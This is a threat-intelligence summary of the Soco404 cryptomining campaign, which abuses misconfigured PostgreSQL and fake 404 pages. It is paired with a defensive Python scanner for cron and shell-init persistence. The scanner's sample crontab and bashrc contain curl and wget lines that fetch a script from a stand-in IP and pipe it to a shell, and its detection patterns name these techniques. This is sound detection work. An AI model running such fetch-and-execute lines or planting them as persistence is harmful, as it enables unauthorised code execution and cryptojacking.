
Multiplatform Cryptomining Campaign Uses Fake Error Pages to Hide Payload

NetmanageIT OpenCTI - opencti.netmanageit.com




SUMMARY :

A new iteration of a broad cryptomining campaign, tracked as Soco404, has been identified. The attackers exploit weaknesses in cloud environments, in particular misconfigured PostgreSQL instances, to deploy cryptominers on both Linux and Windows hosts. They masquerade the miner process as a legitimate one, persist through cron jobs and shell initialization files, and host their malware on compromised legitimate servers. The malware uses local sockets for communication, and its payloads are hidden inside fake 404 HTML pages hosted on Google Sites. The campaign is part of a larger crypto-scam infrastructure and is versatile and opportunistic: the attackers use several ingress tools and target a range of entry points to maximize reach and persistence across diverse targets.
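The persistence mechanisms named above (cron jobs and shell initialization files re-launching a downloaded stager) are the ones a responder can hunt for cheaply on a Linux host. The script below is an added example written for this page, not code from the report or from the campaign; it scans crontab and shell-init text for download-and-execute patterns, raw-IP download URLs, execution out of world-writable temp directories and inline base64 decoding. The heuristics, the file names and the two sample files are constructed assumptions, not indicators published by the report.

```python
"""Hunt for download-and-execute persistence in cron entries and shell
initialization files. Added example; the regexes are this page's own
heuristics and the sample inputs below are constructed, not real captures."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    source: str           # file the line came from, e.g. "/etc/crontab"
    line_no: int          # 1-based line number within that file
    reasons: tuple        # names of the heuristics that fired, in table order
    text: str             # the offending line, stripped


# Heuristic table (assumed stager shapes; the report does not publish the
# exact command lines, so these are generic miner-dropper patterns).
HEURISTICS = {
    # curl/wget output piped straight into a shell interpreter
    "fetch-and-pipe-to-shell": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|da|z)?sh\b"),
    # download URL addressed by a bare IPv4 literal rather than a hostname
    "raw-ip-url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
    # something executed from a world-writable scratch directory
    "exec-from-tmp": re.compile(r"(?:^|[\s;&|])(?:/dev/shm|/tmp|/var/tmp)/\S+"),
    # inline base64 decoding, typical of an embedded second stage
    "base64-decode": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
}


def scan_persistence(source: str, text: str) -> list:
    """Return one Finding per non-comment line on which any heuristic fires."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = tuple(name for name, rx in HEURISTICS.items() if rx.search(line))
        if reasons:
            findings.append(Finding(source, line_no, reasons, line))
    return findings


# Constructed sample inputs (203.0.113.0/24 is a documentation range).
SAMPLE_CRONTAB = """\
# m h dom mon dow user command   (constructed sample, not a real capture)
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root curl -s http://203.0.113.10/x | sh
@reboot root /var/tmp/.cache/update >/dev/null 2>&1
"""

SAMPLE_BASHRC = """\
# constructed sample ~/.bashrc
export PATH=$HOME/bin:$PATH
alias ll='ls -alF'
wget -q -O- http://203.0.113.10/i.sh | bash &
"""


def main():
    for source, text in (("/etc/crontab", SAMPLE_CRONTAB), ("~/.bashrc", SAMPLE_BASHRC)):
        for f in scan_persistence(source, text):
            print(f"{f.source}:{f.line_no} [{', '.join(f.reasons)}] {f.text}")


if __name__ == "__main__":
    main()
```

On a live host, feed it the contents of /etc/crontab, /etc/cron.d/*, each user's crontab (crontab -l -u USER) and the usual shell-init files (/etc/profile, /etc/bash.bashrc, ~/.bashrc, ~/.profile, ~/.bash_profile); treat hits as leads to triage, not verdicts, since legitimate automation occasionally matches the raw-IP or temp-directory patterns.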

OPENCTI LABELS :

cryptomining,persistence,cve-2025-24813,compromised-servers,process-masquerading,multiplatform,fake-404-pages,postgresql,crypto-scam,soco404



